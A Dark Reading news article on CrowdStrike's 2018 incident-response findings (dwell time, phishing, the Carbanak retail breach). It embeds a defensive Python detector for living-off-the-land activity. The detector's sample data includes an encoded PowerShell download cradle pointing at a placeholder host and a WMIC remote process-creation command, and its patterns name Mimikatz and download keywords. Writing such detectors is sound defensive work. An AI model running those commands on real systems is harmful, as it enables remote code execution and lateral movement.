Dark Reading is part of the Informa Tech Division of Informa PLC

CrowdStrike: More Organizations Now Self-Detect Their Own Cyberattacks

But it still takes an average of 85 days to spot one, the security firm's incident response investigations found.

The good news: Three-quarters of enterprises this year discovered on their own that they had been hacked, rather than learning of it from a third party. The bad news: It took them an average of 85 days to spot the attack.

That means hackers still have the upper hand. What's more, they need less than two hours, on average, to move from the initially compromised machine deeper into a target's network, according to CrowdStrike, which today published its "Cyber Intrusion Services Casebook, 2018," a report on a sampling of its real-world incident response (IR) investigations for clients.

"We noticed attackers this year were pretty brazen and stealthy: Eighty-six days [before getting discovered] is still a problem," even when victim organizations are getting better at self-detection, says Tom Etheridge, vice president of services for CrowdStrike. The number of hacked organizations that spotted their own attacks rose 7% this year over those from CrowdStrike Services' IR engagements in 2017.

"It doesn't mean [organizations] are preventing breaches, but they have better tools and visibility for detecting breaches,” he says. "Dwell time is still a problem. So even though self-detection is getting better ... an attacker in the organization for 85 days is not ideal."

CrowdStrike recommends what it calls the 1-10-60 rule: Detect an attack on your organization within one minute, take 10 minutes to investigate it, and then remediate it within 60 minutes. "Organizations that can operate at this level will dramatically improve their chances of staying ahead of the adversary and stopping a potential breach from occurring," the company wrote in its case report.

Attacker Behavior
One-third of all the IR cases CrowdStrike investigated involved social engineering and phishing - an increase of 11% over last year's cases. The main forms of social engineering were business email compromise (BEC) attacks and nation-states using spear-phishing to gain a foothold in their targets' networks, according to the data. Plain old commodity malware such as TrickBot was also widely used to gain an initial foothold, either to infiltrate further or to sell that access to other cybercriminals or nation-state hackers for ransomware, intellectual property theft, extortion, fraud, or cryptomining.

"Commodity malware was really a precursor of another type of threat actor or to stay active [in the target's network]," Etheridge says. "They use [the malware] at a later date for other campaigns that monetize that access, or they sell that access to another threat actor toward its campaign to monetize IP or information."

The stealthiest attacks on organizations were ones that culled legitimate credentials from their targets and skillfully used them. CrowdStrike saw plenty of cases of attackers also employing legitimate tools in the victim's network, such as PowerShell and Windows Management Instrumentation, as another way to camouflage their activity.
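The "living off the land" pattern described above, PowerShell and WMI driven with legitimate credentials, leaves its clearest trace in process-creation telemetry. The following detection logic is an added example written for this page, not code from CrowdStrike or its casebook; it runs over constructed Sysmon-style process-creation records (the hosts, users, times and command lines are invented) and flags encoded PowerShell, download cradles, Office applications spawning a shell, and WMI-driven remote execution, then measures how quickly the activity reached a second host, the interval the report puts at under two hours on average.

```python
"""Detection logic for 'living off the land' process-creation events.

The five records below are constructed for this example in the shape of
Sysmon Event ID 1 (process creation) data; hosts, users, times and command
lines are invented and do not come from the CrowdStrike casebook.
"""
import base64
import re
import shlex
from datetime import datetime

PS_PATH = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"


def encode_ps(script: str) -> str:
    """Base64 a script the way PowerShell's -EncodedCommand expects it (UTF-16LE)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed sample telemetry: a workstation foothold, then a WMI hop to a file server.
SAMPLE_EVENTS = [
    {"ts": "2018-11-05T09:02:11", "host": "ws-1042", "user": r"CORP\jdoe",
     "parent": r"C:\Windows\explorer.exe", "image": PS_PATH,
     "cmdline": r"powershell.exe -NoProfile -Command Get-ChildItem C:\Users"},
    {"ts": "2018-11-05T09:14:37", "host": "ws-1042", "user": r"CORP\jdoe",
     "parent": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "image": PS_PATH,
     "cmdline": "powershell.exe -w hidden -nop -enc " + encode_ps(
         "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage.ps1')")},
    {"ts": "2018-11-05T09:51:02", "host": "ws-1042", "user": r"CORP\jdoe",
     "parent": r"C:\Windows\System32\cmd.exe", "image": r"C:\Windows\System32\wbem\WMIC.exe",
     "cmdline": 'wmic /node:srv-files-03 process call create "powershell -nop -c whoami"'},
    {"ts": "2018-11-05T09:51:05", "host": "srv-files-03", "user": r"CORP\jdoe",
     "parent": r"C:\Windows\System32\wbem\WmiPrvSE.exe", "image": PS_PATH,
     "cmdline": "powershell -nop -c whoami"},
    {"ts": "2018-11-05T10:03:44", "host": "srv-ad-01", "user": r"NT AUTHORITY\SYSTEM",
     "parent": r"C:\Windows\System32\services.exe", "image": r"C:\Windows\System32\svchost.exe",
     "cmdline": "svchost.exe -k netsvcs"},
]

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
CRADLE = re.compile(r"IEX\b|Invoke-Expression|DownloadString|DownloadFile|FromBase64String|Invoke-Mimikatz", re.I)
HIDDEN = re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)
WMIC_REMOTE = re.compile(r"/node:\S+.*\bprocess\s+call\s+create\b", re.I)


def _basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def decode_encoded_command(cmdline: str):
    """Return the decoded -EncodedCommand payload, or None if there is none.
    PowerShell accepts any unambiguous prefix of the switch (-e, -ec, -enc, ...),
    so the check matches prefixes rather than the full switch name."""
    try:
        args = shlex.split(cmdline, posix=False)  # non-POSIX: backslashes in paths stay literal
    except ValueError:
        args = cmdline.split()
    for flag, value in zip(args, args[1:]):
        f = flag.lower()
        if f.startswith("-e") and "-encodedcommand".startswith(f):
            try:
                return base64.b64decode(value, validate=True).decode("utf-16-le")
            except (ValueError, UnicodeDecodeError):
                return None  # flag present but payload is not a valid encoded command
    return None


def classify(event: dict) -> list:
    """Return the names of the detections that fire for one process-creation event."""
    hits = []
    image, parent, cmd = _basename(event["image"]), _basename(event["parent"]), event["cmdline"]
    if image == "powershell.exe":
        decoded = decode_encoded_command(cmd)
        if decoded is not None:
            hits.append("powershell_encoded_command")
        if HIDDEN.search(cmd):
            hits.append("powershell_hidden_window")
        if CRADLE.search(cmd + " " + (decoded or "")):  # inspect the decoded script too
            hits.append("powershell_download_cradle")
        if parent in OFFICE_PARENTS:
            hits.append("office_spawned_powershell")
        if parent == "wmiprvse.exe":
            hits.append("wmi_spawned_shell")
    elif image == "cmd.exe" and parent == "wmiprvse.exe":
        hits.append("wmi_spawned_shell")  # WMI provider host launching a shell: remote execution landed here
    elif image == "wmic.exe" and WMIC_REMOTE.search(cmd):
        hits.append("wmic_remote_process_create")  # the source side of the same hop
    return hits


def run_detections(events):
    """Return alerts as (timestamp, host, user, hits), oldest first, for events with any hit."""
    alerts = []
    for ev in events:
        hits = classify(ev)
        if hits:
            alerts.append((datetime.fromisoformat(ev["ts"]), ev["host"], ev["user"], hits))
    return sorted(alerts, key=lambda a: a[0])


def time_to_lateral_movement(alerts):
    """Gap between the first alert and the first alert on a different host (None if no hop)."""
    if not alerts:
        return None
    first_ts, first_host = alerts[0][0], alerts[0][1]
    for ts, host, _, _ in alerts[1:]:
        if host != first_host:
            return ts - first_ts
    return None


if __name__ == "__main__":
    found = run_detections(SAMPLE_EVENTS)
    for ts, host, user, hits in found:
        print(f"{ts:%H:%M:%S} {host:<13} {user:<22} {', '.join(hits)}")
    print(f"first hop to a second host after {time_to_lateral_movement(found)}")
```

On the constructed data the foothold fires four detections at once (encoded command, hidden window, download cradle, Office parent), the benign administrator PowerShell on the same workstation fires none, and the WMI hop is caught on both ends: `wmic ... process call create` on the source and WmiPrvSE.exe spawning PowerShell on the target 36 minutes later. Real telemetry needs the same logic fed from Sysmon or EDR process events, with the benign-parent list tuned to what the IT support team actually runs, which is exactly the tooling the report says attackers blend into.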

"They remain dormant and take advantage of it for an extended period of time," Etheridge explains. "And they are understanding the tools the [target] has and knows them even better than they do."

Carbanak/Carbon Spider
Take the case of one of CrowdStrike's large retailer clients that was hacked by the infamous and sophisticated Carbanak, aka Carbon Spider, cybercrime organization. Carbanak had hidden inside the retailer's massive global network infrastructure for several years, waging a massive gift card fraud operation.

When the retailer finally noticed it had been breached, it called in CrowdStrike, which first spotted an administrative user's Office 365 mail account being used for credential harvesting. The attackers had abused the user's cached Active Directory Federation Services (AD FS) credentials and run Mimikatz to steal other privileged accounts, including the retailer's ServiceNow account. Among other systems, Carbanak had access to the retailer's IT team systems, which it used to monitor and track changes to the network. It even had access to TeamViewer and ScreenConnect to spy on incident response and interact with targeted machines.

"This adversary employed a 'living off the land' methodology to remotely access systems, using system native and the same tools that the client's IT support teams used legitimately," CrowdStrike wrote in its report.

The Carbanak attackers even searched the retailer's ServiceNow IT ticketing system for information on gift cards.

"The customer had believed it had quelled the attack and extracted the attacker," Etheridge says. "But the attacker remained persistent in the customer's environment to monitor ServiceNow and to actually look at email traffic from the fraud department - all using legitimate credentials."

Remediate, Then Investigate
Some organizations, under pressure to get back up and running quickly after an attack, are choosing to remediate their systems before bringing in CrowdStrike to investigate, Etheridge says. Those that take that approach typically aren't facing any monetary losses from the attack.

"They're looking to remediate before they investigate," he says. "There's a little bit of a balancing act for engaging the right solution for that account."

The risk with that approach is that an attacker could still remain hidden in the network. The best bet is for organizations to plan for an attacker that just won't go away: "You need to make sure you maintain visibility and control" to monitor for that, Etheridge says, as well as deploy two-factor authentication to better protect credentials and lock down infrastructure controls, such as firewall settings. Proactive threat hunting can also give organizations a leg up on a persistent attacker, he notes.

Kelly Jackson Higgins is the Executive Editor of Dark Reading. She is an award-winning veteran technology and business journalist with more than two decades of experience in reporting and editing for various publications, including Network Computing, Secure Enterprise ...

User Rank: Moderator
1/8/2019 | 12:52:29 AM
Stay vigilant and attentive
I am a little confused here - if it isn't your organization that detects that an attack is going on, who else would? The customers? I mean what's important here is that you should have a team that's vigilant against all attacks against your system and facility. That's the kind of service that you should be paying for in any case right?
User Rank: Strategist
1/2/2019 | 10:24:27 PM
Stepping up
It is good to see an increasing number of organisations really stepping up their cybersecurity game in view of recent hikes in data breaches. Hopefully this whole viewpoint would deter attackers to drill down the figures to a bare minimum. Perhaps it could take ages but at least we are seeing progress which is definitely a good start.